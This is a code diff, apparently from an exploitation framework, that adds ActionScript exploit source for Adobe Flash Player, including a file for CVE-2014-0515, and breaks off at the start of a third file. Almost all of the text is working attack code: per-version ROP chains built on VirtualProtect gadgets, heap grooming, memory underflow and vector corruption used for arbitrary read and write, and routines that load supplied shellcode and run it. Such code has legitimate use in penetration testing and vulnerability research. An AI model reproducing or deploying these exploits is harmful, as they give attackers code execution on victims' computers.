+					payload.writeUnsignedInt((vftableAddr_copy + 4947594));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2022508));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 4691374));
+					payload.writeUnsignedInt((vftableAddr_copy + 6824832));
+					payload.writeUnsignedInt((vftableAddr_copy + 4164715));
+					payload.writeUnsignedInt((vftableAddr_copy + 5837496));
+					payload.writeUnsignedInt((vftableAddr_copy + 2847021));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,2,202,235":
+					vftableAddr_copy = (vftableAddr_copy - 7734032);
+					_local_5 = (vftableAddr_copy + 0x940000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 4947578));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2022729));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 5249755));
+					payload.writeUnsignedInt((vftableAddr_copy + 6828928));
+					payload.writeUnsignedInt((vftableAddr_copy + 4261382));
+					payload.writeUnsignedInt((vftableAddr_copy + 4553024));
+					payload.writeUnsignedInt((vftableAddr_copy + 2847456));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,300,257":
+					vftableAddr_copy = (vftableAddr_copy - 8232016);
+					_local_5 = (vftableAddr_copy + 0x9C3000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 5328586));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2069614));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 6497300));
+					payload.writeUnsignedInt((vftableAddr_copy + 7222148));
+					payload.writeUnsignedInt((vftableAddr_copy + 5022322));
+					payload.writeUnsignedInt((vftableAddr_copy + 4972967));
+					payload.writeUnsignedInt((vftableAddr_copy + 3071572));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,3,300,273":
+					vftableAddr_copy = (vftableAddr_copy - 8236216);
+					_local_5 = (vftableAddr_copy + 0x9C4000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 5331930));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2070667));
+					payload.position = 80;
+					payload.writeUnsignedInt((vftableAddr_copy + 6500737));
+					payload.writeUnsignedInt((vftableAddr_copy + 7226252));
+					payload.writeUnsignedInt((vftableAddr_copy + 5142060));
+					payload.writeUnsignedInt((vftableAddr_copy + 5127634));
+					payload.writeUnsignedInt((vftableAddr_copy + 3074828));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,4,402,278":
+					vftableAddr_copy = (vftableAddr_copy - 8503560);
+					_local_5 = (vftableAddr_copy + 0xA23000);
+					payload.writeUnsignedInt((vftableAddr_copy + 5581452));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1202409));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 6927402));
+					payload.writeUnsignedInt((vftableAddr_copy + 7480208));
+					payload.writeUnsignedInt((vftableAddr_copy + 5373116));
+					payload.writeUnsignedInt((vftableAddr_copy + 5713520));
+					payload.writeUnsignedInt((vftableAddr_copy + 3269652));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,4,402,287":
+					vftableAddr_copy = (vftableAddr_copy - 8507728);
+					_local_5 = (vftableAddr_copy + 0xA24000);
+					payload.writeUnsignedInt((vftableAddr_copy + 5582348));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 1202841));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 6927143));
+					payload.writeUnsignedInt((vftableAddr_copy + 7484304));
+					payload.writeUnsignedInt((vftableAddr_copy + 5481024));
+					payload.writeUnsignedInt((vftableAddr_copy + 5107604));
+					payload.writeUnsignedInt((vftableAddr_copy + 5747979));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,110":
+					vftableAddr_copy = (vftableAddr_copy - 11716376);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.position = 20;
+					payload.writeUnsignedInt((vftableAddr_copy + 9813154));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 448623));
+					payload.position = 96;
+					payload.writeUnsignedInt((vftableAddr_copy + 9326463));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 5731300));
+					payload.writeUnsignedInt((vftableAddr_copy + 8910259));
+					payload.writeUnsignedInt((vftableAddr_copy + 8630687));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,135":
+					vftableAddr_copy = (vftableAddr_copy - 11716400);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.writeUnsignedInt((vftableAddr_copy + 1101327));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4733912));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 4540));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 28862));
+					payload.writeUnsignedInt((vftableAddr_copy + 512197));
+					payload.writeUnsignedInt((vftableAddr_copy + 1560889));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,146":
+					vftableAddr_copy = (vftableAddr_copy - 11716320);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.writeUnsignedInt((vftableAddr_copy + 1101327));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4733912));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 4540));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 28862));
+					payload.writeUnsignedInt((vftableAddr_copy + 512197));
+					payload.writeUnsignedInt((vftableAddr_copy + 1560889));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,5,502,149":
+					vftableAddr_copy = (vftableAddr_copy - 11712240);
+					_local_5 = (vftableAddr_copy + 0xEC6000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 10373824));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4331881));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9292830));
+					payload.writeUnsignedInt((vftableAddr_copy + 10691852));
+					payload.writeUnsignedInt((vftableAddr_copy + 5731956));
+					payload.writeUnsignedInt((vftableAddr_copy + 7150772));
+					payload.writeUnsignedInt((vftableAddr_copy + 3344264));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,168":
+					vftableAddr_copy = (vftableAddr_copy - 11825816);
+					_local_5 = (vftableAddr_copy + 0xEE9000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 9924439));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4370139));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9564155));
+					payload.writeUnsignedInt((vftableAddr_copy + 10736920));
+					payload.writeUnsignedInt((vftableAddr_copy + 5830863));
+					payload.writeUnsignedInt((vftableAddr_copy + 9044861));
+					payload.writeUnsignedInt((vftableAddr_copy + 7984191));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,171":
+					vftableAddr_copy = (vftableAddr_copy - 11834040);
+					_local_5 = (vftableAddr_copy + 0xEEA000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 9925589));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4370636));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9564442));
+					payload.writeUnsignedInt((vftableAddr_copy + 10741016));
+					payload.writeUnsignedInt((vftableAddr_copy + 5771380));
+					payload.writeUnsignedInt((vftableAddr_copy + 10153408));
+					payload.writeUnsignedInt((vftableAddr_copy + 7983199));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,6,602,180":
+					vftableAddr_copy = (vftableAddr_copy - 11824712);
+					_local_5 = (vftableAddr_copy + 0xEE9000);
+					payload.position = 5;
+					payload.writeUnsignedInt((vftableAddr_copy + 9923173));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 4368414));
+					payload.position = 77;
+					payload.writeUnsignedInt((vftableAddr_copy + 9562061));
+					payload.writeUnsignedInt((vftableAddr_copy + 10736920));
+					payload.writeUnsignedInt((vftableAddr_copy + 5828990));
+					payload.writeUnsignedInt((vftableAddr_copy + 9042989));
+					payload.writeUnsignedInt((vftableAddr_copy + 8661666));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,169":
+					vftableAddr_copy = (vftableAddr_copy - 12902952);
+					_local_5 = (vftableAddr_copy + 16904192);
+					payload.writeUnsignedInt((vftableAddr_copy + 1116239));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 10368763));
+					payload.position = 76;
+					payload.writeUnsignedInt((vftableAddr_copy + 2586086));
+					payload.writeUnsignedInt((vftableAddr_copy + 11752328));
+					payload.writeUnsignedInt((vftableAddr_copy + 32732));
+					payload.writeUnsignedInt((vftableAddr_copy + 8192266));
+					payload.writeUnsignedInt((vftableAddr_copy + 1578904));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,7,700,202":
+					vftableAddr_copy = (vftableAddr_copy - 0xc4f508);
+					_local_5 = (vftableAddr_copy + 0x101f000);
+					payload.position = 8;
+					payload.writeUnsignedInt((vftableAddr_copy + 0x7dfcd2)); // 107dfcd2 : add esp,44h ; ret
+					payload.position = 0x40;
+					payload.writeUnsignedInt((vftableAddr_copy + 0x12a269)); // 1012a269 : xchg edx,esp ; add  eax,dword ptr [eax]; add  byte ptr [edi+5Eh],bl ; pop ecx ; ret 
+					payload.position = 0x50;
+					payload.writeUnsignedInt((vftableAddr_copy + 0xcb497));  // 100cb497 : pop eax ; ret
+					payload.writeUnsignedInt((vftableAddr_copy + 0xb35388)); // 10b35388 : ptr to VirtualProtect 
+					payload.writeUnsignedInt((vftableAddr_copy + 0x110d3d)); // 10110d3d : mov eax,dword ptr [eax] ; ret
+					payload.writeUnsignedInt((vftableAddr_copy + 0x887362)); // 10887362 : push eax ; ret
+					payload.writeUnsignedInt((vftableAddr_copy + 0x331bff)); // 10331bff : jmp esp
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(0x40);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,8,800,97":
+					vftableAddr_copy = (vftableAddr_copy - 129165844);
+					_local_5 = (vftableAddr_copy + 16904192);
+					payload.position = 8;
+					payload.writeUnsignedInt(vftableAddr_copy);
+					payload.position = 16;
+					payload.writeUnsignedInt((vftableAddr_copy + 117625919));
+					payload.writeUnsignedInt(-1810746282);
+					payload.writeUnsignedInt((scAddr + 76));
+					payload.writeUnsignedInt((vftableAddr_copy + 122565891));
+					payload.position = 44;
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 0x0400));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 123362382));
+					payload.position = 80;
+					payload.writeUnsignedInt((scAddr + 192));
+					payload.position = 112;
+					payload.writeUnsignedInt((vftableAddr_copy + 32365));
+					payload.writeUnsignedInt((vftableAddr_copy + 11760520));
+					payload.writeUnsignedInt((vftableAddr_copy + 1117213));
+					payload.writeUnsignedInt((vftableAddr_copy + 3721232));
+					payload.writeUnsignedInt((vftableAddr_copy + 8274178));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				case "win 11,8,800,50":
+					vftableAddr_copy = (vftableAddr_copy - 12936000);
+					_local_5 = (vftableAddr_copy + 17149952);
+					payload.writeUnsignedInt((vftableAddr_copy + 404531));
+					payload.position = 64;
+					payload.writeUnsignedInt((vftableAddr_copy + 2583617));
+					payload.position = 72;
+					payload.writeUnsignedInt((vftableAddr_copy + 7914140));
+					payload.writeUnsignedInt((vftableAddr_copy + 4550));
+					payload.writeUnsignedInt((vftableAddr_copy + 11780992));
+					payload.writeUnsignedInt((vftableAddr_copy + 32684));
+					payload.writeUnsignedInt((vftableAddr_copy + 142358));
+					payload.writeUnsignedInt((vftableAddr_copy + 1577816));
+					payload.writeUnsignedInt(scAddr);
+					payload.writeUnsignedInt(0x1000);
+					payload.writeUnsignedInt(64);
+					payload.writeUnsignedInt((scAddr - 4));
+					break;
+				default:
+					return (null);
+			};
+			return (payload);
+		}
+		
+		public function exploit():Boolean
+		{
+			var vector_objects_entry_length:int;
+			var shellcode_byte = null;
+			var _local_6:uint;
+			var i:int;
+			var vftable_addr:uint;
+			var shellcode_address:uint;
+			var vector_objects_entry_idx:uint;
+			var length_vector_byte_arrays:uint;
+			var vector_byte_arrays:Vector.<ByteArray> = new Vector.<ByteArray>(0);
+			var vector_objects:Vector.<Object> = new Vector.<Object>(0);
+			var twos_object:Object = new <Object>[2, 2, 2, 2, 2, 2, 2, 2];
+			var vickers_byte_array:ByteArray = new ByteArray();
+			while (i < 0x0500)
+			{
+				vector_byte_arrays[i] = new ByteArray();
+				vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
+				i++;
+			};
+			vickers_byte_array.writeUTFBytes("vickers");
+			vickers_byte_array.length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
+			ApplicationDomain.currentDomain.domainMemory = vickers_byte_array;
+			vector_byte_arrays[i] = new ByteArray();
+			vector_byte_arrays[i].length = ApplicationDomain.MIN_DOMAIN_MEMORY_LENGTH;
+			length_vector_byte_arrays = i;
+			i = 0;
+			while (i < (vector_byte_arrays.length - 1))
+			{
+				vector_byte_arrays[i++] = null;
+			};
+			i = 0;
+			while (i < 0x8000)
+			{
+				vector_objects[i] = new <Object>[i, twos_object, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1];
+				i++;
+			};
+			// _local_6 => nil => 0, makes li32(_local_6 - offset) makes it underflow!
+			// Example leak:  0275ef00 => 10c4f508 0000003b 00002326
+			if (((!((li16((_local_6 + 1)) == 114))) && (((vftable_addr = li32((_local_6 - 0x0100)) ) == 305419896))))
+			{
+			};
+			if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_idx = li32((_local_6 - 248)) ) == 305419896))))
+			{
+			};
+			vector_objects_entry_idx = (vector_objects_entry_idx >> 3);
+			if (((!((li16((_local_6 + 1)) == 114))) && (((vector_objects_entry_length = li32((_local_6 - 252)) ) == 305419896))))
+			{
+			};
+			
+			// No success
+			if (vector_objects_entry_length != vector_objects[vector_objects_entry_idx].length)
+			{
+				vickers_byte_array = null;
+				vector_byte_arrays[length_vector_byte_arrays] = null;
+				i = 0;
+				while (i < vector_objects.length)
+				{
+					vector_objects[i++] = null;
+				};
+				return (false);
+			};
+			
+			i = 0;
+			while (i < vector_objects.length)
+			{
+				if (i != vector_objects_entry_idx)
+				{
+					vector_objects[i] = null;
+				};
+				i++;
+			};
+			// Use underflow to leak shellcode address
+			if (((!((li16((_local_6 + 1)) == 114))) && (((shellcode_address = li32((_local_6 - 0x0200)) ) == 305419896))))
+			{
+			};
+			shellcode_address = (shellcode_address + 0x1300);
+			var rop_payload:ByteArray = makePayload(vftable_addr, shellcode_address);
+			if (rop_payload == null)
+			{
+				return (true);
+			};
+			var j:uint;
+			var shellcode_length:uint = shellcode.length;
+			var shellcode_byte_array:ByteArray = new ByteArray();
+			shellcode_byte_array.endian = "littleEndian";
+			while (j < shellcode_length)
+			{
+				shellcode_byte = (shellcode.charAt(j) + shellcode.charAt((j + 1)));
+				shellcode_byte_array.writeByte(parseInt(shellcode_byte, 16));
+				j = (j + 2);
+			};
+			vector_byte_arrays[length_vector_byte_arrays].position = 0;
+			vector_byte_arrays[length_vector_byte_arrays].endian = "littleEndian";
+			vector_byte_arrays[length_vector_byte_arrays].writeBytes(rop_payload);
+			vector_byte_arrays[length_vector_byte_arrays].writeBytes(shellcode_byte_array);
+			// Use underflow to overwrite and get code execution
+			if (li16((_local_6 + 1)) != 114)
+			{
+				si32((shellcode_address + 1), (_local_6 - 244));
+			};
+			vector_objects[vector_objects_entry_idx][1][0];
+			return (true);
+		}
+		
+		
+	}
+}//package 

external/source/exploits/CVE-2014-0515/Graph.as

@@ -0,0 +1,411 @@
+//compile with AIR SDK 13.0: mxmlc Graph.as -o Graph.swf
+package {
+	import flash.display.Sprite;
+	import flash.utils.ByteArray;
+	import flash.display.Shader;
+	import flash.system.Capabilities;
+	import flash.net.FileReference;
+	import flash.utils.Endian;
+	import __AS3__.vec.Vector;
+	import __AS3__.vec.*;
+	import flash.display.LoaderInfo;
+	
+	public class Graph extends Sprite {
+		
+		static var counter:uint = 0;
+		
+		protected var Shad:Class;
+		var shellcode_byte_array:ByteArray;
+		var aaab:ByteArray;
+		var shellcodeObj:Array;
+		
+		public function Graph(){
+			var tweaked_vector:* = undefined;
+			var tweaked_vector_address:* = undefined;
+			var shader:Shader;
+			var flash_memory_protect:Array;
+			var code_vectors:Array;
+			var address_code_vector:uint;
+			var address_shellcode_byte_array:uint;
+			this.Shad = Graph_Shad;
+			super();
+			shellcodeObj = LoaderInfo(this.root.loaderInfo).parameters.sh.split(",");
+			var i:* = 0;
+			var j:* = 0;
+			
+			// Just one try
+			counter++;
+			if (counter > 1)
+			{
+				return;
+			};
+			
+			// Memory massage
+			var array_length:uint = 0x10000;
+			var vector_size:uint = 34;
+			var array:Array = new Array();
+			i = 0;
+			while (i < array_length)
+			{
+				array[i] = new Vector.<int>(1);
+				i++;
+			};
+			i = 0;
+			while (i < array_length)
+			{
+				array[i] = new Vector.<int>(vector_size);
+				i++;
+			};
+			i = 0;
+			while (i < array_length)
+			{
+				array[i].length = 0;
+				i++;
+			};
+			i = 0x0200;
+			while (i < array_length)
+			{
+				array[(i - (2 * (j % 2)))].length = 0x0100;
+				i = (i + 28);
+				j++;
+			};
+			
+			// Overflow and Search for corrupted vector
+			var corrupted_vector_idx:uint;
+			var shadba:ByteArray = (new this.Shad() as ByteArray);
+			shadba.position = 232;
+			if (Capabilities.os.indexOf("Windows 8") >= 0)
+			{
+				shadba.writeUnsignedInt(2472);
+			};
+			shadba.position = 0;
+			while (1)
+			{
+				shader = new Shader();
+				try
+				{
+					shader.byteCode = (new this.Shad() as ByteArray);
+				} catch(e)
+				{
+				};
+				i = 0;
+				while (i < array_length)
+				{
+					if (array[i].length > 0x0100)
+					{
+						corrupted_vector_idx = i;
+						break;
+					};
+					i++;
+				};
+				if (i != array_length)
+				{
+					if (array[corrupted_vector_idx][(vector_size + 1)] > 0) break;
+				};
+				array.push(new Vector.<int>(vector_size));
+			};
+			
+			// Tweak the vector following the corrupted one
+			array[corrupted_vector_idx][vector_size] = 0x40000001;
+			tweaked_vector = array[(corrupted_vector_idx + 1)];
+			
+			// repair the corrupted vector by restoring its
+			// vector object pointer and length
+			var vector_obj_addr:* = tweaked_vector[0x3fffffff];
+			tweaked_vector[((0x40000000 - vector_size) - 3)] = vector_obj_addr;
+			tweaked_vector[((0x40000000 - vector_size) - 4)] = vector_size;
+			i = 0;
+			var val:uint;
+			while (true)
+			{
+				val = tweaked_vector[(0x40000000 - i)];
+				if (val == 0x90001B) break;
+				i++;
+			};
+			tweaked_vector_address = 0;
+			if (tweaked_vector[((0x40000000 - i) - 4)] > 0)
+			{
+				tweaked_vector[4] = 0x41414141;
+				tweaked_vector_address = ((tweaked_vector[((0x40000000 - i) - 4)] + (8 * (vector_size + 2))) + 8);				
+			};
+			
+			// More memory massage, fill an array of FileReference objects
+			var file_reference_array:Array = new Array();
+			i = 0;
+			while (i < 64)
+			{
+				file_reference_array[i] = new FileReference();
+				i++;
+			};
+			
+			var file_reference_vftable:uint = this.find_file_ref_vtable(tweaked_vector, tweaked_vector_address);
+			var cancel_address:uint = this.read_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20));
+			var do_it:Boolean = true;
+			var memory_protect_ptr:uint;
+			var aaaq:uint;
+			if (do_it)
+			{
+				flash_memory_protect = this.findFlashMemoryProtect(tweaked_vector, tweaked_vector_address);
+				memory_protect_ptr = flash_memory_protect[0];
+				aaaq = flash_memory_protect[1]; // Not sure, not used on the Flash 11.7.700.202 analysis, maybe some type of adjustment
+				code_vectors = this.createCodeVectors(0x45454545, 0x90909090);
+				address_code_vector = this.findCodeVector(tweaked_vector, tweaked_vector_address, 0x45454545);
+				this.fillCodeVectors(code_vectors);
+				tweaked_vector[7] = (memory_protect_ptr + 0); // Flash VirtualProtect call
+				tweaked_vector[4] = aaaq; 				
+				tweaked_vector[0] = 0x1000; // Length
+				tweaked_vector[1] = (address_code_vector & 0xFFFFF000); // Address
+				
+				// 10255e21 ff5014          call    dword ptr [eax+14h]  ds:0023:41414155=????????
+				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), (tweaked_vector_address + 8));
+				
+				// 1) Set memory as executable
+				i = 0;
+				while (i < 64)
+				{
+					file_reference_array[i].cancel();
+					i++;
+				};
+				
+				// 2) Execute shellcode 
+				tweaked_vector[7] = address_code_vector;
+				i = 0;
+				while (i < 64)
+				{
+					file_reference_array[i].cancel();
+					i++;
+				};
+				
+				// Restore FileReference cancel function pointer
+				// Even when probably msf module is not going to benefit because of the ExitThread at the end of the payloads
+				this.write_memory(tweaked_vector, tweaked_vector_address, (file_reference_vftable + 0x20), cancel_address);
+			};
+		}
+		
+		// returns the integer at memory address
+		// vector: vector with tweaked length
+		// vector_address: vector's memory address
+		// address: memory address to read
+		function read_memory(vector:Vector.<int>, vector_address:uint, address:uint):uint{
+			if (address >= vector_address)
+			{
+				return (vector[((address - vector_address) / 4)]);
+			};
+			return (vector[(0x40000000 - ((vector_address - address) / 4))]);
+		}
+		
+		function write_memory(vector:Vector.<int>, vector_address:uint, address:uint, value:uint){
+			if (address >= vector_address)
+			{
+				vector[((address - vector_address) / 4)] = value;
+			} else
+			{
+				vector[(0x40000000 - ((vector_address - address) / 4))] = value;
+			};
+		}
+		
+		function findFlashMemoryProtect(vector:*, vector_address:*):Array{
+			var content:uint;
+			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
+			var index:uint;
+			var memory_protect_ptr:uint;
+			var _local_6:uint;
+			if (allocation >= vector_address)
+			{
+				index = ((allocation - vector_address) / 4);
+			} else
+			{
+				index = (0x40000000 - ((vector_address - allocation) / 4));
+			};
+			
+			//push    1 ; 6a 01
+			//push    dword ptr [eax-8] ; ff 70 f8
+			//push    dword ptr [eax-4] ; ff 70 fc
+			//call    sub_1059DD00 // Will do VirtualProtect
+			var offset:uint;
+			while (1)
+			{
+				index--;
+				content = vector[index];
+				if (content == 0xfff870ff)
+				{
+					offset = 2;
+					break;
+				};
+				if (content == 0xf870ff01)
+				{
+					offset = 1;
+					break;
+				};
+				if (content == 0x70ff016a)
+				{
+					content = vector[(index + 1)];
+					if (content == 0xfc70fff8)
+					{
+						offset = 0;
+						break;
+					};
+				} else
+				{
+					if (content == 0x70fff870)
+					{
+						offset = 3;
+						break;
+					};
+				};
+			};
+			
+			memory_protect_ptr = ((vector_address + (4 * index)) - offset);
+			index--;
+			var content_before:uint = vector[index];
+			
+			if (content_before == 0x16a0424)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			if (content_before == 0x6a042444)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			if (content_before == 0x424448b)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			if (content_before == 0xff016a04)
+			{
+				return ([memory_protect_ptr, _local_6]);
+			};
+			_local_6 = (memory_protect_ptr - 6);
+			
+			while (1)
+			{
+				index--;
+				content = vector[index];
+				if (content == 0x850ff50)
+				{
+					if (uint(vector[(index + 1)]) == 0x5e0cc483)
+					{
+						offset = 0;
+						break;
+					};
+				};
+				content = (content & 0xFFFFFF00);
+				if (content == 0x50FF5000)
+				{
+					if (uint(vector[(index + 1)]) == 0xcc48308)
+					{
+						offset = 1;
+						break;
+					};
+				};
+				content = (content & 0xFFFF0000);
+				if (content == 0xFF500000)
+				{
+					if (uint(vector[(index + 1)]) == 0xc4830850)
+					{
+						if (uint(vector[(index + 2)]) == 0xc35d5e0c)
+						{
+							offset = 2;
+							break;
+						};
+					};
+				};
+				content = (content & 0xFF000000);
+				if (content == 0x50000000)
+				{
+					if (uint(vector[(index + 1)]) == 0x830850ff)
+					{
+						if (uint(vector[(index + 2)]) == 0x5d5e0cc4)
+						{
+							offset = 3;
+							break;
+						};
+					};
+				};
+			};
+			memory_protect_ptr = ((vector_address + (4 * index)) + offset);
+			return ([memory_protect_ptr, _local_6]);
+		}
+		
+		// vector: vector with tweaked length
+		// address: memory address of vector data
+		function find_file_ref_vtable(vector:*, address:*):uint{
+			var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c));
+			
+			// Find an allocation of size 0x2a0
+			var allocation_size:uint;
+			while (true)
+			{
+				allocation_size = this.read_memory(vector, address, (allocation + 8));
+				if (allocation_size == 0x2a0) break;
+				if (allocation_size < 0x2a0)
+				{
+					allocation = (allocation + 0x24); // next allocation
+				} else
+				{
+					allocation = (allocation - 0x24); // prior allocation
+				};
+			};
+			var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc));
+			while (true)
+			{
+				if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break;
+				if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break;
+				allocation_contents = this.read_memory(vector, address, (allocation_contents + 8));
+			};
+			return (allocation_contents);
+		}
+		
+		// Returns pointer to the nops in one of the allocated code vectors
+		function findCodeVector(vector:*, vector_address:*, mark:*):uint{
+			var allocation_size:uint;
+			var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
+			while (true)
+			{
+				allocation_size = this.read_memory(vector, vector_address, (allocation + 8));
+				if (allocation_size == 0x7f0) break; // Code Vector found
+				allocation = (allocation + 0x24); // next allocation
+			};
+			
+			// allocation contents should be the vector code, search for the mark 0x45454545 
+			var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc));
+			while (true)
+			{
+				if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break;
+				allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation
+			};
+			return ((allocation_contents + 0x2c));
+		}
+				
+		// create 8 vectors of size 0x7f0 inside an array to place shellcode 
+		function createCodeVectors(mark:uint, nops:uint){
+			var code_vectors_array:Array = new Array();
+			var i:* = 0;
+			while (i < 8)
+			{
+				code_vectors_array[i] = new Vector.<uint>(((0x7f0 / 4) - 8)); // new Vector.<uint>(0x1f4)
+				code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4
+				code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4
+				i++;
+			};
+			return (code_vectors_array);
+		}
+		
+		
+		// Fill with the code vectors with the shellcode
+		function fillCodeVectors(array_code_vectors:Array) {
+			var i:uint = 0;
+			var sh:uint=1;
+			
+			while(i < array_code_vectors.length)
+			{	
+				for(var u:String in shellcodeObj)
+				{
+					array_code_vectors[i][sh++] = Number(shellcodeObj[u]); 
+				}
+				i++;
+				sh = 1;
+			}
+		}		
+	}
+}//package 

external/source/exploits/CVE-2014-0515/Graph_Shad.as

@@ -0,0 +1,10 @@
+package
+{
+	import mx.core.ByteArrayAsset;
+	
